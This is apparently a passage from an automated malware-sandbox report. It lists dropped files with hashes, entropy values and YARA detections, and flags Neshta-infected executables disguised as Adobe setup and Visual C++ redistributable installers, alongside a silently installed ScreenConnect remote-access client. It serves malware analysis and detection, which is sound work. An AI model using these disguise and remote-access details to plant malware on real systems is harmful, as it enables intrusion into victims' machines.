                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.422024969420582
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                                        MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                                        SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                                        SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                                        SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.Override.en-US.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):332
                                                                        Entropy (8bit):4.8237545463154605
                                                                        Encrypted:false
                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oH+DdPIGKfU4G6cA0Br8VNar1:rHy2DLI4MWoHw1ItfU49cA6Em1
                                                                        MD5:A935A8EF2D279A909135D0719BD52255
                                                                        SHA1:14761786644BFDBD62D9CA59CF24EBEF72794DF3
                                                                        SHA-256:234C8AB455FCC7DEFC945C4FED455B559D45F2C9FB1A90F976DE544186757397
                                                                        SHA-512:E41CD9543C3BDD06FA51124934410325CA1DC8FB545CDA8AFF1A30FB8FC5278BD11F6F20D44D9251011DFD3D8C455B2629B26A1F67C7B6AC686D8089E7305C92
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_Q2T}5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Nephrology Associates..Nephrology Associates
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.Override.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):180
                                                                        Entropy (8bit):4.9556690067327445
                                                                        Encrypted:false
                                                                        SSDEEP:3:n87j23zjkQXGKZMHLsbNRLFS9Am12MFuAvOAsyQHxW+i3zjvGztlmut/l:8kVXdyrKDLIP12MUAvvR+oR6/l
                                                                        MD5:CD7DBC7ABEDA9893CE25793744443958
                                                                        SHA1:DBBBBE2694D4B9B990881F279B4313574DBEAC9B
                                                                        SHA-256:E13ED2C59366D0EEA74863FD71A81F0CB977CCE1EDFDE304FC538690A4F6AC89
                                                                        SHA-512:E880F131FF460384940248AB2ECD97189AE0B7169FE5246440DFBCE32F295CBD7697CE2EE65B434A0E40BE91B91C21B2C14B1F446B2B1650D0A5D94C0D4F37EF
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.en-US.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):35325
                                                                        Entropy (8bit):4.731693526918675
                                                                        Encrypted:false
                                                                        SSDEEP:768:/ABBqfjszQ0wzLBG3jMl7X2njOFr92wzLMhjKV1zwj8XE9Wwo:/ABBqeQDLBG3IlD2njOFr92wzLMhjKV9
                                                                        MD5:2A2B496732CEA1744929BD8C97B411FB
                                                                        SHA1:4BCD377500FCF023A681B7ED769B082713BED0AE
                                                                        SHA-256:381F7F8B62159D6A76FC19BC2A7397E83776127D54E3956B8DD143CF7149AAFA
                                                                        SHA-512:4F34BAFC302A99D82238787938A7B99FFCAD9C048E6AB63BBB168B197733A4252AB05E08A63869152EECF546F7D5777E744F2AD0A2D13D438B63250CB9DCE2A8
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....X.......PADPADP.'...wp.......y....)>..Ldt..... $...1$./>>...L.y.0.C._.........Qj.o....<....=...R...&.......1p2.r.x.u?Y..R..I.5.2q..R...>.E.@ ).w.l.....S...'.C.I.........4.........J..P<.E..=c!.@To..#.._.2.......k..h..........^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.X...Q........4_.Sns.........=..]t...X....8.e`}..n..H[..S@?.~....,...j.2..*v.......B....A...a...D.w..K,..t...*v..&.....r........Y...i..'.............'.......Z.....#2e..........|....)..%....A.....u;N.......}.tD....4.J...L......5..M....K..3U..M.................>.......?...A......3.m....=.H......n..,4.~...<h..u...i.H.........V/...P.z....V".....(N.......mC...8.....x2..'....N...^..Js$.cr..a...*[#...M..WT.3....+0..D..RT|.......*...I.....3.....%..P...]..`...u...n:..............b.1............O..oF.......|..z.* &.[ OJ;!I.V!
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\Client.resources
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2238
                                                                        Entropy (8bit):5.525574002540019
                                                                        Encrypted:false
                                                                        SSDEEP:24:zHE4j13yrM0fn10H0ufKPOxp3KC/JBJmFmcEJJoFJCBJJuecEJJzI+E5IOZZpOIc:rHxAaDT3KC/yESDxE0+72ofJKawTSd
                                                                        MD5:0B47901F2C782922F034FBA8E8062916
                                                                        SHA1:893075F8CA04F92DBEF7F6E81223E1B08E29328F
                                                                        SHA-256:64DA2CFEACFCBA97CAD701DA9288618BC42A20F69DD4A0FE5652CE49EF92524C
                                                                        SHA-512:B3DB1C4FFED1DBAEF5E03F4819BCBA5F0A6864C26123E059B6A649911ADBD380AE3AA1EB63C2397EA1EA5FC61103468B5DB838080D7C7D5DE848B5002C31CBD6
                                                                        Malicious:false
                                                                        Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^....E.....(....jF.C....../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p....a...-...........8...'...h...........O...........w.......P..............."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.8...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r.....*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r.....<D.a.r.k.T.h.e.m.e.D.e.f.a.u.l.t.H.i.g.h.l.i.g.h.t.C.o.l.o.r.....,D.a.r.k.T.h.e.m.e.M.a.i.n.B.a.s.e.C.o.l.o.r.....$D.a.r.k.T.h.e.m.e.T.e.x.t.C.o.l.o.r.....,L.i.g.h.t.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r.....>L.i.g.h.t.T.h.e.m
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):147456
                                                                        Entropy (8bit):6.95042317553366
                                                                        Encrypted:false
                                                                        SSDEEP:3072:tIhbeLI0tsjKnVloc2KYL5+RJK4h0E9twjJ6fu:ubeLXtppM8KEfwg
                                                                        MD5:F1EA5E1DD79B36A6CF64EC132DCEE436
                                                                        SHA1:784F9DB1C166A2DE65A49C99A17F022F9A685AA9
                                                                        SHA-256:EC01ED64E7BBC30A53C66D432E634F5EB12ECE99AB3FC1A45440400A4FF25323
                                                                        SHA-512:22ACE1ED0A501CFC7707F50FBEE7D1AF356D232459028301CEB4F9C1F142A92CA4EF0EBCA833F917B0154B15A88D62FDE7A8AC46E4460C287C2348A7A774B221
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0..8...........W... ...`....... ...............................d....@.................................lW..O....`............................................................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B.................W......H........z..............|n..p....V........................................{....*:.(......}....*z.(....s....%..(...+o....o....*...0..[....... ......... ...........x...%.r...p.%.r...p........y...%.....(.....4..............s ....;...*..0...........~....%-.&~..........s!...%.....(...+..~....%-.&~..........s#...%.....(...+.r9..p..(....-.rW..p+.ro..p($....(1.....,...(%...*.*..0..Y........-..*........i.ZX.}.........+...%.X. ........X.....2....+.......i(&......iX....X.....2..*j.s'...
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):30208
                                                                        Entropy (8bit):5.820363385380722
                                                                        Encrypted:false
                                                                        SSDEEP:768:1smKdE7MSlTOzxD1u2Af2Oq1cq7Clxnx1IbA5rb/:i4vOvP+q1v7ClWbkrb/
                                                                        MD5:95F6BCC76C1069CC377635EC46C4183D
                                                                        SHA1:724A325DD9D39F3CC429DC99065B2BB2DD5B0E68
                                                                        SHA-256:1913808A0E185B794C42DC8CFB0347884D84AD8459D591BB203F17740C12EF56
                                                                        SHA-512:4A3003512983392E628932CBC738735E511FE5805C6ED7E75B2451E13618411617EF55CCB9022BE75D8FED5C95EC74AB75DE4B893A7AA8B075094E3FC7FB9527
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.Z].........." ..0..n..........n.... ........... ....................................@.....................................O.................................................................................... ............... ..H............text...tm... ...n.................. ..`.rsrc................p..............@..@.reloc...............t..............@..B................P.......H........@...K..........................................................J(......(....(....*..0..9.......(....r...p(....(........(......i.2....(....+..s....(....*....0..d.........(......}.....s....}.....s....}.....s....}.....{...........s....o...... 0u.........s....s....}....*..(.....{......o....~....%-.&~......-...s....%.....(....&*...0..O........(.....{......o.....{......(.....~....%-.&~..........s....%.....(.......(.....*....... .'G.......0...........{......(......(.......(
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):90504
                                                                        Entropy (8bit):6.454336660844859
                                                                        Encrypted:false
                                                                        SSDEEP:1536:CVnKQbrt7pdnNmhno7GcqbksWjcdLyXN4WA6tMw8NktY:C8wt7TvmbLLyXOWA6tMSC
                                                                        MD5:79EC78769BF8092719B0E72B174BAB54
                                                                        SHA1:4C480310A72DD3B7B4C56F3D1347757D0B989CAE
                                                                        SHA-256:A7C54EE431B6733FDC3F26D7E439C748843B9D88DA35805D4BEE9A0B07F64DEE
                                                                        SHA-512:84FDA5C4E63C4C8FF5E1B9F43FF76DB1E341A8552B7F87B150C48894D7E28ABB539090C7E48B43507487FBF669E55ABC7B191D50573FD3AF80E2B79890C40223
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:I..~(a.~(a.~(a.sz..Y(a.sz..o(a.sz...(a.8y..|(a.wP..t(a.`z..}(a.~(`..(a..Q...(a.sz...(a..Q...(a.Rich~(a.........................PE..L...F.*[..........................................@......................................@................................../..x.......`............H..........H.......8............................'..@...............t............................text............................... ..`.rdata...W.......X..................@..@.data...@0...@....... ..............@....rsrc...`............2..............@..@.reloc..H............8..............@..B........................................................................................................................................................................................................................................................................................................
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):371200
                                                                        Entropy (8bit):5.9748911687895365
                                                                        Encrypted:false
                                                                        SSDEEP:6144:wplDccjhts4N+/Xon+LAM+tIVnF6nWpnPq8uiph/jISvVx4k4DEV7PX4:wp57joy7yAHtKnJlpx7f
                                                                        MD5:CA0F11FB4EC67C9B1EAF6B2D790830DA
                                                                        SHA1:4BDABF67897A2EF58E97AD4F96C5CA96AB846E28
                                                                        SHA-256:418E1EDEE0E84AFB4FF1A75AA1AEF204CEAAA4A54F67AB9829718775A6C9BE8A
                                                                        SHA-512:975B9704F5532A6ACA2BE23B8507AF3879CCE0441B0850784D6B4D8888DE86A0AFF1018A53D1A50AC5BBB210F1D47775525F1628950E2B8BDF8076C07A3D373B
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0.................. ........... ....................... ......".....@.................................h...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......T.............................................................."..s0...*&...s1...**....s2...*2......s3...*:........s4...*B..........s5...*>..}6.....}7...*&...(8...*2...(8......*2...(9......*2...(9......*>...(9.........*>...(9.........*N.{6....{7....s:...*R.{6....{7.....s;...*V.{6....{7......s<...*^.{6....{7........s=...*f.{6....{7..........s>...*z.{6....{7....{?....{@...s;...*..{6....{7....{A....{B....{C...s<...*..{6....{7....{D....{E....{F....{G...s=...*..{6....{7..
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1774592
                                                                        Entropy (8bit):6.658227212263865
                                                                        Encrypted:false
                                                                        SSDEEP:24576:peK+RfmT01krTL3ZALqdrimVsJq2l6TOKoMjSvShvU8OiH4SqfKPTsUTHEWEZfMi:pegT0+TL3Z0Mi963PSuIiH7efP
                                                                        MD5:D7C33234363E582439BA9BDE89585D8D
                                                                        SHA1:2F0F224B9CBAAB77160A80B41D8E136FAAD49EF0
                                                                        SHA-256:B9E298C36F055E74700FF1E0DA5E922541E976A918F6F6E1DECB745FD81347D6
                                                                        SHA-512:BD75E0898CE65BE19CA00C6AEF69B692F0389033F4B97204A7B96E09ADAA3408B26B0B103928B6DFFF65DC6A5FEEF1CD60C7AB12CB6AF4477C49AA437AC0800A
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0.............j*... ...@....... ..............................D;....@..................................*..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......(...0|..........X...@....)........................................s&...*..s'...*:.((.....()...*..{*...*"..}*...*J.(+........(,...&*:.((.....(-...*..{....*"..}....*..0..(........(/......+.............(,...&..X....i2.*v.((....s0...}.....s1...}....*f.{......(...+.....o3....*.0...........o4....+..o5......(...+&.o....-....,..o......*..........."........{..........o6...&.......(.....*....0..J..........{............o7...-,..o8...........(...+&.{...........(...+o:....(...+*v.
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):529288
                                                                        Entropy (8bit):6.132516961515779
                                                                        Encrypted:false
                                                                        SSDEEP:6144:S/qbea7sQeGx1sGkRHHMJxzT2sWS1H4lXwntstgP4KMdmE7xuSrYcB2a4IDAlfuY:SC/sixylBHe1yXIJPdmUSeZQcjn
                                                                        MD5:5597916ED66980D09C38DD206054CD6F
                                                                        SHA1:9F42D0BA7B747133000C73465B6FA6D019C0A9DE
                                                                        SHA-256:CD8F31D24C26920C6BB562E2778922752C1B3693FFFCFEB33F2AB516819838AB
                                                                        SHA-512:19CA41E484E8AF1A5AEAC68D068C00788B840F4ACF0A3BB34FEE2C1CC577EE0C4D599BC170A4E255D4C7A878E334D3BE289CE3A31E18F8BE03257407F8616FE3
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Z].........."...0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x.................................................................{C...*..{D...*V.(E.....}C.....}D...*...0..;........u+.....,/(F....{C....{C...oG...,.(H....{D....{D...oI...*.*. )'+. )UU.Z(F....{C...oJ...X )UU.Z(H....{D...oK...X*.0...........r...p......%..{C....................-.q.............-.&.+.......oL....%..{D........../...../...-.q/......../...-.&.+.../...oL....(M...*..{N...*..{O...*V.(E.....}N.....}O...*...0..;........u0.....,/(F....{N....{N...oG...,.(H....{O..
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe.config
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):259
                                                                        Entropy (8bit):4.947405559236275
                                                                        Encrypted:false
                                                                        SSDEEP:6:JiMVBdTMkI7VKk7Vri7VNQuWuAKPKXk2ygAyON0pW4QIT:MMHd417VOE9XXoE0B4xT
                                                                        MD5:95F04AA18DC27E4F0C73AC6829DCC3D8
                                                                        SHA1:2F361486C18E23CEA4B375E1C9CCCDC14BDD620D
                                                                        SHA-256:F3C7ED5A1114CBFA6E3E996F4B0311EDB5E25DC2099FD7EB7A3A456C261A2D94
                                                                        SHA-512:59BFD8675C2B215E793BF343B6D1AA9C3304AB763C5870A4934AB947284AF7BB0493FC4B5A6048DC3D531262E061D68D7395F09EAEE1EBF1524C0D8ED63164B4
                                                                        Malicious:false
                                                                        Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false"/>.. </runtime>..</configuration>
                                                                        C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\app.config
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):559
                                                                        Entropy (8bit):4.6563079743992954
                                                                        Encrypted:false
                                                                        SSDEEP:12:MMHdGPa9yos26K9YG0a9yVXpxs26K9YG1lokVXpxOOmo/ENmjvPvTVXpx3xT:Jdz9iKN9qXp8K3XpRmo/dHvxXp/
                                                                        MD5:3A17CBE4E7BA4431A6083EC2F6D5125A
                                                                        SHA1:8C676267EB22369E7C12427BC0003D6B4C9E9C00
                                                                        SHA-256:A56BA549DD171D04E9C7FFFF0F74A55E99D2B8E96FB7C27E354788E293FFF123
                                                                        SHA-512:8BBC715DD894A8CBA776F27EABE95B4E9CC5DEDAB85755CE7331FF3C1460425E2B6241B5D95EDF204C2900133D502ED21391A7215485A5BD91F95F2969D92A5A
                                                                        Malicious:false
                                                                        Preview: .<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. </ScreenConnect.UserInterfaceSettings>..</configuration>
                                                                        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.441581793400409
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                                        MD5:E9116F5812E84117738237DE522B5445
                                                                        SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
                                                                        SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                                        SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.485543952012
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                        MD5:5BFD09277E78C899F354E5E1144B162A
                                                                        SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                                        SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                                        SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.562712500136307
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                                        MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                                        SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                                        SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                                        SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                                        C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.515754456132426
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                                        MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                                        SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                                        SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                                        SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Joe Security
                                                                        C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.562807885786494
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                                        MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                                        SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                                        SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                                        SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                                        Malicious:true
                                                                        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.51577139672898
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                                        MD5:60738E3D150CFDD2CD11C779ED82C473
                                                                        SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                                        SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                                        SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                                        Malicious:true
